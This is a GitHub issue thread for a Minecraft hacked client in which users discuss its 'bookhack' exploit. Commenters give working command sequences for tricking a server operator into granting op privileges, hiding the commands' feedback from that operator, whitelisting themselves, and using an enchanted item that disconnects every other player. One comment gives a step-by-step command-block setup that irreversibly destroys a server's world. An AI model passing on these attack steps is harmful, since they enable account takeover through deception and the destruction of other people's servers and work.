### ISSUE TITLE
Multiple commands idea :) (bookhack)

### ISSUE THREAD

**Issue by ravenje** [Wurst-Imperium/Wurst-Client#651]
I see a comment at https://github.com/Wurst-Imperium/Wurst-Client/issues/646
is it possible or can you add that we can separate commands in bookhack?
/op hacker;/ban admin
?

**Comment by GummiBoat** [comment]
I don't think it's possible to do that within ONE book (through the current exploit). But you also can just give him multiple books. Anyways, /gamerule logAdminCommands false is the wrong command to begin with. You should active /gamerule sendCommandFeedback false first. Because then nothing he activates while clicking stuff in books will get sended to him. so you just can pretend, that you gave him the wrong book and give him the second one, giving yourself op.

Or you setup a Spammer file and as soon as you get op with the first book, you activate it through a keybinding in wurst. (.t Spammer FILENAME)
And Set the Delay between messages to something like ~50ms.
The Spammer File should look like this:

/gamerule sendCommandFeedback false
/gamerule logAdminCommands false
/gamerule commandBlockOutput false
/whitelist add ravenje
/whitelist on
/setblock ~ ~-1 ~ command_block 0 replace {Command:"/give @a stick 1 0 {ench:[{id:13,lvl:1}]}"}
/setblock ~ ~ ~ redstone_block
/title @a title "Open your Inventory!"

If any person open its inventory, he disconnects immediately, don't open your inventory, before you threw the stick away, if you're the one executing the spammer. Congratulations. You're now alone on a whitelisted server.

If you want to know how to delete the map quickly as f*ck (irreversible, without backups) feel free to ask.

**Comment by Saint-Khaine** [comment]
So the books'o'doom would have the commands in the following order:

1. /gamerule sendCommandfeedback false
2. /gamerule logadmin false
3. /gamerule commandoutput false
4. /op <me>

Or are 2 and 3 irrelevant?  I'll also take the knowledge of deleting the map.

**Comment by GummiBoat** [comment]
2 and 3 are irrelevant if you're not working with commandblocks while someone else is online. and as soon as you have op you can easily change the gamerules by yourself. so just give him /gamerule sendCommandFeedback false and then /op.

Deleting the Map. Okay. This does take a little setup. To be presize this one: http://puu.sh/husdz/2298ca30a2.jpg
This is only for the direction north. (F3 -> Facing) For the other directions.. well.. I hope you can figure that out yourself.

you begin by creating a 3x3x4 Platform (preferably on the ground.) Z should go negative in the direction you're building.
First you place the 4 commandblocks, i'll paste the commands down below. then you place a detector rail in the air space between them. continue to place a regular rail, a powered rail ( torch next to it) and again a regular rail - as said above - in the north direction (this is important.)
finally you paste the commands in:
Left (west from the detector rail): /fill ~-15 ~-9 ~-15 ~-1 ~10 ~-1 air
Right (east from the detector rail): /fill ~15 ~-9 ~-15 ~1 ~10 ~-1 air
Above the detector rail: /fill ~-1 ~-3 ~-4 ~1 ~-15 ~ air
Below the detector rail: /clone ~1 ~ ~-3 ~-1 ~2 ~ ~-1 ~ ~-7 replace
Last step: place a minecart on the detector rail. hop in (if you want to. you can just give it a push too.) and start rolling your doom. This should effectively bring destruction and a little rollercoaster into your world. enjoy your ride.

**Comment by GlitchHead** [comment]
sadly... the latest version of spigot-1.8.3 compiled from [BuildTools.jar] (https://hub.spigotmc.org/jenkins/job/BuildTools/) has the book hack patched. Have fun on the last few outdated servers! unless @Alexander01998 can find a workaround.

**Comment by GummiBoat** [comment]
@GlitchHead The Problem with getting Books with JSON in it, is - you need a commandblock/op to get it. But don't worry, afaik he's working on something called "Sign Hack" (#622 )

**Comment by ravenje** [comment]
I hope Sign Hack will be added.

**Comment by pokeball99** [comment]
Not possible? y?
